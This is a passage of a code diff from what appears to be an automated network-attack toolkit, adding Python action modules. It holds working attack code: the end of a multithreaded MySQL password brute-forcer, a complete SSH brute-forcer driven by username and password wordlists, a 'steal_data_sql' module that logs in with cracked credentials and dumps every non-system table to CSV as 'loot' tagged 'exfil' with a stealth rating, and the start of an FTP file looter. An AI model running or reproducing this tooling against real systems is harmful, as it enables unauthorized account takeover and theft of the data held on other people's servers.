||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# ---------- SQL ----------
|
||||
def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = b_port):
|
||||
"""
|
||||
Connect without selecting a DB, then SHOW DATABASES; returns (True, [dbs]) or (False, []).
|
||||
"""
|
||||
try:
|
||||
conn = pymysql.connect(
|
||||
host=adresse_ip,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port
|
||||
)
|
||||
try:
|
||||
with conn.cursor() as cursor:
|
||||
cursor.execute("SHOW DATABASES")
|
||||
databases = [db[0] for db in cursor.fetchall()]
|
||||
finally:
|
||||
try:
|
||||
conn.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
|
||||
logger.info(f"Available databases: {', '.join(databases)}")
|
||||
return True, databases
|
||||
except pymysql.Error as e:
|
||||
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
|
||||
return False, []
|
||||
|
||||
# ---------- DB upsert fallback ----------
|
||||
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
|
||||
mac_k = mac or ""
|
||||
ip_k = ip or ""
|
||||
user_k = user or ""
|
||||
db_k = database or ""
|
||||
port_k = int(port or 0)
|
||||
|
||||
try:
|
||||
with self.shared_data.db.transaction(immediate=True):
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
|
||||
VALUES('sql',?,?,?,?,?,?,?,NULL)
|
||||
""",
|
||||
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
|
||||
)
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
UPDATE creds
|
||||
SET "password"=?,
|
||||
hostname=COALESCE(?, hostname),
|
||||
last_seen=CURRENT_TIMESTAMP
|
||||
WHERE service='sql'
|
||||
AND COALESCE(mac_address,'')=?
|
||||
AND COALESCE(ip,'')=?
|
||||
AND COALESCE("user",'')=?
|
||||
AND COALESCE("database",'')=?
|
||||
AND COALESCE(port,0)=?
|
||||
""",
|
||||
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
|
||||
|
||||
# ---------- worker / queue ----------
|
||||
def worker(self, success_flag):
|
||||
"""Worker thread to process SQL bruteforce attempts."""
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, port = self.queue.get()
|
||||
try:
|
||||
success, databases = self.sql_connect(adresse_ip, user, password, port)
|
||||
if success:
|
||||
with self.lock:
|
||||
for dbname in databases:
|
||||
self.results.append([adresse_ip, user, password, port, dbname])
|
||||
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
|
||||
logger.success(f"Databases found: {', '.join(databases)}")
|
||||
self.save_results()
|
||||
self.remove_duplicates()
|
||||
success_flag[0] = True
|
||||
finally:
|
||||
self.queue.task_done()
|
||||
|
||||
# Optional delay between attempts
|
||||
if getattr(self.shared_data, "timewait_sql", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_sql)
|
||||
|
||||
|
||||
def run_bruteforce(self, adresse_ip: str, port: int):
|
||||
total_tasks = len(self.users) * len(self.passwords)
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
|
||||
for user in self.users:
|
||||
for password in self.passwords:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return False, []
|
||||
self.queue.put((adresse_ip, user, password, port))
|
||||
|
||||
success_flag = [False]
|
||||
threads = []
|
||||
thread_count = min(40, max(1, total_tasks))
|
||||
|
||||
for _ in range(thread_count):
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce.")
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
|
||||
self.queue.join()
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
|
||||
return success_flag[0], self.results
|
||||
|
||||
# ---------- DB persistence ----------
|
||||
def save_results(self):
|
||||
# for each database found, create/update a row in creds (service='sql', database=<dbname>)
|
||||
for ip, user, password, port, dbname in self.results:
|
||||
mac = self.mac_for_ip(ip)
|
||||
hostname = self.hostname_for_ip(ip) or ""
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
service="sql",
|
||||
mac=mac,
|
||||
ip=ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=dbname,
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
if "ON CONFLICT clause does not match" in str(e):
|
||||
self._fallback_upsert_cred(
|
||||
mac=mac, ip=ip, hostname=hostname, user=user,
|
||||
password=password, port=port, database=dbname
|
||||
)
|
||||
else:
|
||||
logger.error(f"insert_cred failed for {ip} {user} db={dbname}: {e}")
|
||||
self.results = []
|
||||
|
||||
def remove_duplicates(self):
|
||||
# unnecessary with the unique index; kept for compatibility.
|
||||
pass
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
sd = SharedData()
|
||||
sql_bruteforce = SQLBruteforce(sd)
|
||||
logger.info("SQL brute force module ready.")
|
||||
exit(0)
|
||||
except Exception as e:
|
||||
logger.error(f"Error: {e}")
|
||||
exit(1)
|
||||
315
resources/default_config/actions/ssh_bruteforce.py
Normal file
@@ -0,0 +1,315 @@
|
||||
"""
|
||||
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
|
||||
to find accessible accounts using various user credentials. It logs the results of
|
||||
successful connections.
|
||||
|
||||
SQL version (minimal changes):
|
||||
- Targets still provided by the orchestrator (ip + port)
|
||||
- IP -> (MAC, hostname) mapping read from DB 'hosts'
|
||||
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
|
||||
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
|
||||
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
|
||||
"""
|
||||
|
||||
import os
|
||||
import paramiko
|
||||
import socket
|
||||
import threading
|
||||
import logging
|
||||
import time
|
||||
from datetime import datetime
|
||||
from queue import Queue
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
# Configure the logger
|
||||
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
|
||||
|
||||
# Silence Paramiko internals
|
||||
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys",
|
||||
"paramiko.kex", "paramiko.auth_handler"):
|
||||
logging.getLogger(_name).setLevel(logging.CRITICAL)
|
||||
|
||||
# Define the necessary global variables
|
||||
b_class = "SSHBruteforce"
|
||||
b_module = "ssh_bruteforce"
|
||||
b_status = "brute_force_ssh"
|
||||
b_port = 22
|
||||
b_service = '["ssh"]'
|
||||
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
|
||||
b_parent = None
|
||||
b_priority = 70 # adjust the priority here if needed
|
||||
b_cooldown = 1800 # 30 minutes between two runs
|
||||
b_rate_limit = '3/86400' # at most 3 runs per day
|
||||
|
||||
|
||||
class SSHBruteforce:
|
||||
"""Wrapper called by the orchestrator."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
self.ssh_bruteforce = SSHConnector(shared_data)
|
||||
logger.info("SSHConnector initialized.")
|
||||
|
||||
def bruteforce_ssh(self, ip, port):
|
||||
"""Run the SSH brute force attack on the given IP and port."""
|
||||
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
|
||||
return self.ssh_bruteforce.run_bruteforce(ip, port)
|
||||
|
||||
def execute(self, ip, port, row, status_key):
|
||||
"""Execute the brute force attack and update status (for UI badge)."""
|
||||
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
|
||||
self.shared_data.bjorn_orch_status = "SSHBruteforce"
|
||||
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": port}
|
||||
|
||||
success, results = self.bruteforce_ssh(ip, port)
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
|
||||
class SSHConnector:
|
||||
"""Handles the connection attempts and DB persistence."""
|
||||
|
||||
def __init__(self, shared_data):
|
||||
self.shared_data = shared_data
|
||||
|
||||
# Load wordlists (unchanged behavior)
|
||||
self.users = self._read_lines(shared_data.users_file)
|
||||
self.passwords = self._read_lines(shared_data.passwords_file)
|
||||
|
||||
# Build initial IP -> (MAC, hostname) cache from DB
|
||||
self._ip_to_identity = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
|
||||
self.lock = threading.Lock()
|
||||
self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
|
||||
self.queue = Queue()
|
||||
|
||||
# ---- Mapping helpers (DB) ------------------------------------------------
|
||||
|
||||
def _refresh_ip_identity_cache(self):
|
||||
"""Load IPs from DB and map them to (mac, current_hostname)."""
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str):
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str):
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# ---- File utils ----------------------------------------------------------
|
||||
|
||||
@staticmethod
|
||||
def _read_lines(path: str):
|
||||
try:
|
||||
with open(path, "r", encoding="utf-8", errors="ignore") as f:
|
||||
return [l.rstrip("\n\r") for l in f if l.strip()]
|
||||
except Exception as e:
|
||||
logger.error(f"Cannot read file {path}: {e}")
|
||||
return []
|
||||
|
||||
# ---- SSH core ------------------------------------------------------------
|
||||
|
||||
def ssh_connect(self, adresse_ip, user, password, port=b_port, timeout=10):
|
||||
"""Attempt to connect to SSH using (user, password)."""
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
|
||||
try:
|
||||
ssh.connect(
|
||||
hostname=adresse_ip,
|
||||
username=user,
|
||||
password=password,
|
||||
port=port,
|
||||
timeout=timeout,
|
||||
auth_timeout=timeout,
|
||||
banner_timeout=timeout,
|
||||
look_for_keys=False, # avoid slow key probing
|
||||
allow_agent=False, # avoid SSH agent delays
|
||||
)
|
||||
return True
|
||||
except (paramiko.AuthenticationException, socket.timeout, socket.error, paramiko.SSHException):
|
||||
return False
|
||||
except Exception as e:
|
||||
logger.debug(f"SSH connect unexpected error {adresse_ip} {user}: {e}")
|
||||
return False
|
||||
finally:
|
||||
try:
|
||||
ssh.close()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# ---- Robust DB upsert fallback ------------------------------------------
|
||||
|
||||
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
|
||||
"""
|
||||
Insert-or-update without relying on ON CONFLICT columns.
|
||||
Works even if your UNIQUE index uses expressions (e.g., COALESCE()).
|
||||
"""
|
||||
mac_k = mac or ""
|
||||
ip_k = ip or ""
|
||||
user_k = user or ""
|
||||
db_k = database or ""
|
||||
port_k = int(port or 0)
|
||||
|
||||
try:
|
||||
with self.shared_data.db.transaction(immediate=True):
|
||||
# 1) Insert if missing
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
|
||||
VALUES('ssh',?,?,?,?,?,?,?,NULL)
|
||||
""",
|
||||
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
|
||||
)
|
||||
# 2) Update password/hostname if present (or just inserted)
|
||||
self.shared_data.db.execute(
|
||||
"""
|
||||
UPDATE creds
|
||||
SET "password"=?,
|
||||
hostname=COALESCE(?, hostname),
|
||||
last_seen=CURRENT_TIMESTAMP
|
||||
WHERE service='ssh'
|
||||
AND COALESCE(mac_address,'')=?
|
||||
AND COALESCE(ip,'')=?
|
||||
AND COALESCE("user",'')=?
|
||||
AND COALESCE("database",'')=?
|
||||
AND COALESCE(port,0)=?
|
||||
""",
|
||||
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
|
||||
)
|
||||
except Exception as e:
|
||||
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
|
||||
|
||||
# ---- Worker / Queue / Threads -------------------------------------------
|
||||
|
||||
def worker(self, success_flag):
|
||||
"""Worker thread to process items in the queue (bruteforce attempts)."""
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping worker thread.")
|
||||
break
|
||||
|
||||
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
|
||||
try:
|
||||
if self.ssh_connect(adresse_ip, user, password, port=port):
|
||||
with self.lock:
|
||||
# Persist success into DB.creds
|
||||
try:
|
||||
self.shared_data.db.insert_cred(
|
||||
service="ssh",
|
||||
mac=mac_address,
|
||||
ip=adresse_ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=None,
|
||||
extra=None
|
||||
)
|
||||
except Exception as e:
|
||||
# Specific fix: fallback manual upsert
|
||||
if "ON CONFLICT clause does not match" in str(e):
|
||||
self._fallback_upsert_cred(
|
||||
mac=mac_address,
|
||||
ip=adresse_ip,
|
||||
hostname=hostname,
|
||||
user=user,
|
||||
password=password,
|
||||
port=port,
|
||||
database=None
|
||||
)
|
||||
else:
|
||||
logger.error(f"insert_cred failed for {adresse_ip} {user}: {e}")
|
||||
|
||||
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
|
||||
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
|
||||
success_flag[0] = True
|
||||
|
||||
finally:
|
||||
self.queue.task_done()
|
||||
|
||||
# Optional delay between attempts
|
||||
if getattr(self.shared_data, "timewait_ssh", 0) > 0:
|
||||
time.sleep(self.shared_data.timewait_ssh)
|
||||
|
||||
|
||||
|
||||
def run_bruteforce(self, adresse_ip, port):
|
||||
"""
|
||||
Called by the orchestrator with a single IP + port.
|
||||
Builds the queue (users x passwords) and launches threads.
|
||||
"""
|
||||
mac_address = self.mac_for_ip(adresse_ip)
|
||||
hostname = self.hostname_for_ip(adresse_ip) or ""
|
||||
|
||||
total_tasks = len(self.users) * len(self.passwords)
|
||||
if total_tasks == 0:
|
||||
logger.warning("No users/passwords loaded. Abort.")
|
||||
return False, []
|
||||
|
||||
for user in self.users:
|
||||
for password in self.passwords:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
|
||||
return False, []
|
||||
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
|
||||
|
||||
success_flag = [False]
|
||||
threads = []
|
||||
thread_count = min(40, max(1, total_tasks))
|
||||
|
||||
for _ in range(thread_count):
|
||||
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
|
||||
t.start()
|
||||
threads.append(t)
|
||||
|
||||
while not self.queue.empty():
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Orchestrator exit signal received, stopping bruteforce.")
|
||||
# clear queue
|
||||
while not self.queue.empty():
|
||||
try:
|
||||
self.queue.get_nowait()
|
||||
self.queue.task_done()
|
||||
except Exception:
|
||||
break
|
||||
break
|
||||
|
||||
self.queue.join()
|
||||
|
||||
for t in threads:
|
||||
t.join()
|
||||
|
||||
return success_flag[0], self.results # Return True and the list of successes if any
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
shared_data = SharedData()
|
||||
try:
|
||||
ssh_bruteforce = SSHBruteforce(shared_data)
|
||||
logger.info("SSH brute force module ready.")
|
||||
exit(0)
|
||||
except Exception as e:
|
||||
logger.error(f"Error: {e}")
|
||||
exit(1)
|
||||
252
resources/default_config/actions/steal_data_sql.py
Normal file
@@ -0,0 +1,252 @@
|
||||
"""
|
||||
steal_data_sql.py — SQL data looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (SQLBruteforce).
|
||||
- DB.creds (service='sql') provides (user,password, database?).
|
||||
- We connect first without DB to enumerate tables (excluding system schemas),
|
||||
then connect per schema to export CSVs.
|
||||
- Output under: {data_stolen_dir}/sql/{mac}_{ip}/{schema}/{schema_table}.csv
|
||||
"""
|
||||
|
||||
import os
|
||||
import logging
|
||||
import time
|
||||
import csv
|
||||
|
||||
from threading import Timer
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
from sqlalchemy import create_engine, text
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="steal_data_sql.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "StealDataSQL"
|
||||
b_module = "steal_data_sql"
|
||||
b_status = "steal_data_sql"
|
||||
b_parent = "SQLBruteforce"
|
||||
b_port = 3306
|
||||
b_trigger = 'on_any:["on_cred_found:sql","on_service:sql"]'
|
||||
b_requires = '{"all":[{"has_cred":"sql"},{"has_port":3306},{"max_concurrent":2}]}'
|
||||
# Scheduling / limits
|
||||
b_priority = 60 # 0..100 (higher processed first in this schema)
|
||||
b_timeout = 900 # seconds before a pending queue item expires
|
||||
b_max_retries = 1 # minimal retries; avoid noisy re-runs
|
||||
b_cooldown = 86400 # seconds (per-host cooldown between runs)
|
||||
b_rate_limit = "1/86400" # at most 3 executions/day per host (extra guard)
|
||||
# Risk / hygiene
|
||||
b_stealth_level = 6 # 1..10 (higher = more stealthy)
|
||||
b_risk_level = "high" # 'low' | 'medium' | 'high'
|
||||
b_enabled = 1 # set to 0 to disable from DB sync
|
||||
# Tags (free taxonomy, JSON-ified by sync_actions)
|
||||
b_tags = ["exfil", "sql", "loot", "db", "mysql"]
|
||||
|
||||
class StealDataSQL:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.sql_connected = False
|
||||
self.stop_execution = False
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
logger.info("StealDataSQL initialized.")
|
||||
|
||||
# -------- Identity cache (hosts) --------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# -------- Credentials (creds table) --------
|
||||
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str, Optional[str]]]:
|
||||
"""
|
||||
Return list[(user,password,database)] for SQL service.
|
||||
Prefer exact IP; also include by MAC if known. Dedup by (u,p,db).
|
||||
"""
|
||||
mac = self.mac_for_ip(ip)
|
||||
params = {"ip": ip, "port": port, "mac": mac or ""}
|
||||
|
||||
by_ip = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password","database"
|
||||
FROM creds
|
||||
WHERE service='sql'
|
||||
AND COALESCE(ip,'')=:ip
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
by_mac = []
|
||||
if mac:
|
||||
by_mac = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password","database"
|
||||
FROM creds
|
||||
WHERE service='sql'
|
||||
AND COALESCE(mac_address,'')=:mac
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
seen, out = set(), []
|
||||
for row in (by_ip + by_mac):
|
||||
u = str(row.get("user") or "").strip()
|
||||
p = str(row.get("password") or "").strip()
|
||||
d = row.get("database")
|
||||
d = str(d).strip() if d is not None else None
|
||||
key = (u, p, d or "")
|
||||
if not u or (key in seen):
|
||||
continue
|
||||
seen.add(key)
|
||||
out.append((u, p, d))
|
||||
return out
|
||||
|
||||
# -------- SQL helpers --------
|
||||
def connect_sql(self, ip: str, username: str, password: str, database: Optional[str] = None):
|
||||
try:
|
||||
db_part = f"/{database}" if database else ""
|
||||
conn_str = f"mysql+pymysql://{username}:{password}@{ip}:{b_port}{db_part}"
|
||||
engine = create_engine(conn_str, connect_args={"connect_timeout": 10})
|
||||
# quick test
|
||||
with engine.connect() as _:
|
||||
pass
|
||||
self.sql_connected = True
|
||||
logger.info(f"Connected SQL {ip} as {username}" + (f" db={database}" if database else ""))
|
||||
return engine
|
||||
except Exception as e:
|
||||
logger.error(f"SQL connect error {ip} {username}" + (f" db={database}" if database else "") + f": {e}")
|
||||
return None
|
||||
|
||||
|
||||
|
||||
def find_tables(self, engine):
|
||||
"""
|
||||
Returns list of (table_name, schema_name) excluding system schemas.
|
||||
"""
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Table search interrupted.")
|
||||
return []
|
||||
q = text("""
|
||||
SELECT TABLE_NAME, TABLE_SCHEMA
|
||||
FROM INFORMATION_SCHEMA.TABLES
|
||||
WHERE TABLE_TYPE='BASE TABLE'
|
||||
AND TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys')
|
||||
""")
|
||||
with engine.connect() as conn:
|
||||
rows = conn.execute(q).fetchall()
|
||||
return [(r[0], r[1]) for r in rows]
|
||||
except Exception as e:
|
||||
logger.error(f"find_tables error: {e}")
|
||||
return []
|
||||
|
||||
|
||||
def steal_data(self, engine, table: str, schema: str, local_dir: str) -> None:
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Data steal interrupted.")
|
||||
return
|
||||
|
||||
q = text(f"SELECT * FROM `{schema}`.`{table}`")
|
||||
with engine.connect() as conn:
|
||||
result = conn.execute(q)
|
||||
headers = result.keys()
|
||||
|
||||
os.makedirs(local_dir, exist_ok=True)
|
||||
out = os.path.join(local_dir, f"{schema}_{table}.csv")
|
||||
|
||||
with open(out, "w", newline="", encoding="utf-8") as f:
|
||||
writer = csv.writer(f)
|
||||
writer.writerow(headers)
|
||||
for row in result:
|
||||
writer.writerow(row)
|
||||
|
||||
logger.success(f"Dumped {schema}.{table} -> {out}")
|
||||
except Exception as e:
|
||||
logger.error(f"Dump error {schema}.{table}: {e}")
|
||||
|
||||
|
||||
# -------- Orchestrator entry --------
|
||||
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
|
||||
try:
|
||||
self.shared_data.bjorn_orch_status = b_class
|
||||
try:
|
||||
port_i = int(port)
|
||||
except Exception:
|
||||
port_i = b_port
|
||||
|
||||
creds = self._get_creds_for_target(ip, port_i)
|
||||
logger.info(f"Found {len(creds)} SQL credentials in DB for {ip}")
|
||||
if not creds:
|
||||
logger.error(f"No SQL credentials for {ip}. Skipping.")
|
||||
return 'failed'
|
||||
|
||||
def _timeout():
|
||||
if not self.sql_connected:
|
||||
logger.error(f"No SQL connection within 4 minutes for {ip}. Failing.")
|
||||
self.stop_execution = True
|
||||
|
||||
timer = Timer(240, _timeout)
|
||||
timer.start()
|
||||
|
||||
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
|
||||
success = False
|
||||
|
||||
for username, password, _db in creds:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
try:
|
||||
base_engine = self.connect_sql(ip, username, password, database=None)
|
||||
if not base_engine:
|
||||
continue
|
||||
|
||||
tables = self.find_tables(base_engine)
|
||||
if not tables:
|
||||
continue
|
||||
|
||||
for table, schema in tables:
|
||||
if self.stop_execution or self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Execution interrupted.")
|
||||
break
|
||||
db_engine = self.connect_sql(ip, username, password, database=schema)
|
||||
if not db_engine:
|
||||
continue
|
||||
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"sql/{mac}_{ip}/{schema}")
|
||||
self.steal_data(db_engine, table, schema, local_dir)
|
||||
|
||||
logger.success(f"Stole data from {len(tables)} tables on {ip}")
|
||||
success = True
|
||||
timer.cancel()
|
||||
return 'success'
|
||||
except Exception as e:
|
||||
logger.error(f"SQL loot error {ip} {username}: {e}")
|
||||
|
||||
timer.cancel()
|
||||
return 'success' if success else 'failed'
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
|
||||
return 'failed'
|
||||
248
resources/default_config/actions/steal_files_ftp.py
Normal file
@@ -0,0 +1,248 @@
|
||||
"""
|
||||
steal_files_ftp.py — FTP file looter (DB-backed)
|
||||
|
||||
SQL mode:
|
||||
- Orchestrator provides (ip, port) after parent success (FTPBruteforce).
|
||||
- FTP credentials are read from DB.creds (service='ftp'); anonymous is also tried.
|
||||
- IP -> (MAC, hostname) via DB.hosts.
|
||||
- Loot saved under: {data_stolen_dir}/ftp/{mac}_{ip}/(anonymous|<username>)/...
|
||||
"""
|
||||
|
||||
import os
|
||||
import logging
|
||||
import time
|
||||
from threading import Timer
|
||||
from typing import List, Tuple, Dict, Optional
|
||||
from ftplib import FTP
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
logger = Logger(name="steal_files_ftp.py", level=logging.DEBUG)
|
||||
|
||||
# Action descriptors
|
||||
b_class = "StealFilesFTP"
|
||||
b_module = "steal_files_ftp"
|
||||
b_status = "steal_files_ftp"
|
||||
b_parent = "FTPBruteforce"
|
||||
b_port = 21
|
||||
|
||||
|
||||
class StealFilesFTP:
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.ftp_connected = False
|
||||
self.stop_execution = False
|
||||
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
|
||||
self._refresh_ip_identity_cache()
|
||||
logger.info("StealFilesFTP initialized")
|
||||
|
||||
# -------- Identity cache (hosts) --------
|
||||
def _refresh_ip_identity_cache(self) -> None:
|
||||
self._ip_to_identity.clear()
|
||||
try:
|
||||
rows = self.shared_data.db.get_all_hosts()
|
||||
except Exception as e:
|
||||
logger.error(f"DB get_all_hosts failed: {e}")
|
||||
rows = []
|
||||
|
||||
for r in rows:
|
||||
mac = r.get("mac_address") or ""
|
||||
if not mac:
|
||||
continue
|
||||
hostnames_txt = r.get("hostnames") or ""
|
||||
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
|
||||
ips_txt = r.get("ips") or ""
|
||||
if not ips_txt:
|
||||
continue
|
||||
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
|
||||
self._ip_to_identity[ip] = (mac, current_hn)
|
||||
|
||||
def mac_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[0]
|
||||
|
||||
def hostname_for_ip(self, ip: str) -> Optional[str]:
|
||||
if ip not in self._ip_to_identity:
|
||||
self._refresh_ip_identity_cache()
|
||||
return self._ip_to_identity.get(ip, (None, None))[1]
|
||||
|
||||
# -------- Credentials (creds table) --------
|
||||
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
|
||||
"""
|
||||
Return list[(user,password)] from DB.creds for this target.
|
||||
Prefer exact IP; also include by MAC if known. Dedup preserves order.
|
||||
"""
|
||||
mac = self.mac_for_ip(ip)
|
||||
params = {"ip": ip, "port": port, "mac": mac or ""}
|
||||
|
||||
by_ip = self.shared_data.db.query(
|
||||
"""
|
||||
SELECT "user","password"
|
||||
FROM creds
|
||||
WHERE service='ftp'
|
||||
AND COALESCE(ip,'')=:ip
|
||||
AND (port IS NULL OR port=:port)
|
||||
""", params)
|
||||
|
||||
by_mac = []
|
||||
if mac:
|
||||
